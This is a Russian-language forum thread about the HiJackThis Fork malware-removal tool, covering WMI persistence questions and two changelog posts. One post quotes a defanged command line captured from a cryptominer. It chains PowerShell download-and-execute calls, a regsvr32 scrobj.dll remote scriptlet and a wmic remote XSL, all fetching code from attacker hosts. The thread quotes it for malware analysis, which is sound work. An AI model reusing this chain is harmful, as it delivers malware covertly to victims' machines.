HiJackThis Fork

HiJackThis Fork и вопросы к разработчикам 2.10.0.20

Dragokas

Angry & Scary Developer
Команда форума
Супер-Модератор
Разработчик
Клуб переводчиков
Сообщения
6,720
Реакции
6,208
Если подсистему WMI не вырезали из системы, то осуществляет. HJT работает не через wmic.exe, а напрямую.
 

thyrex

Ассоциация VN/VIP
VIP
Сообщения
3,025
Реакции
2,639
Спасибо за ответ.

Есть майнер, запуск которого ловит Защитник, но ни в одних логах нет связанных с ним привычных записей WMI. Маскироваться записи могут?
 

Dragokas

Angry & Scary Developer
Команда форума
Супер-Модератор
Разработчик
Клуб переводчиков
Сообщения
6,720
Реакции
6,208
Могут. Пришлите семпл, потом можно будет о чем-то говорить. Через карантин дефендера ведь можно найти тушку и потом оттрейсить из UVs до источника.
 

thyrex

Ассоциация VN/VIP
VIP
Сообщения
3,025
Реакции
2,639
Защитник ловит только запуск (во избежание детекта на форум заменил часть латиницы кириллицей)

CmdLine: C:\Windows\System32\cmd.exe /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('h__p://wmi.webрublicsеrviсеs.org:8080/рower.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://185_26_113_95:8221/рower.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('h__p://wmi.webрublicsеrviсеs.org:8096/рower.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('h__p://wmi.webрublicsеrviсеs.org:8204/рower.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('h__p://wmi22.hа7455h6fi1.net:8080/рower.txt')||regsvr32 /u /s /i:h__p://hа7455h6fi1.net:8080/s22.tхt scrobj.dll&wmic os get /FORMAT:"h__p://wmi2.hа7455h6fi1.net:8220/s2.хsl
 
Последнее редактирование:

thyrex

Ассоциация VN/VIP
VIP
Сообщения
3,025
Реакции
2,639

Dragokas

Angry & Scary Developer
Команда форума
Супер-Модератор
Разработчик
Клуб переводчиков
Сообщения
6,720
Реакции
6,208
Фильтр без Consumer бесполезен.
HJT не отображает "хвосты" от WMI. Уже несколько раз объяснял.
 

Dragokas

Angry & Scary Developer
Команда форума
Супер-Модератор
Разработчик
Клуб переводчиков
Сообщения
6,720
Реакции
6,208
Dragokas обновил(а) ресурс HiJackThis Fork новой записью:

Обновление

[2.10.0.19] - 24.07.2022
- Обновлён белый список служб.
- Некоторые корректировки в O4, чтобы охватывать большее число случаев при отображении постфикса "(Microsoft)".
- O22 - Tasks_Migrated: добавлено определение мигрированных заданий.
- O22 - Tasks: добавлено определение заданий в SysWow64.
- O22 - Tasks: исправлено неверное декодирование не-англоязычных символов xml парсером.

Узнать больше об этом обновлении...
 

Dragokas

Angry & Scary Developer
Команда форума
Супер-Модератор
Разработчик
Клуб переводчиков
Сообщения
6,720
Реакции
6,208
Dragokas обновил(а) ресурс HiJackThis Fork новой записью:

Обновление

[2.10.0.20] - 02.08.2022
- Выполнено несколько исправлений AppLocker (спасибо regist за отчёты, аналитику и поддержку):
- O7 - AppLocker: добавлено определение правила "ManagedInstaller".
- O7 - AppLocker: исправлено hash правило, которое отображалось в виде одной записи, вместо нескольких.
- O7 - Applocker: улучшена процедура "Fix all".

Узнать больше об этом обновлении...
 
Сверху Снизу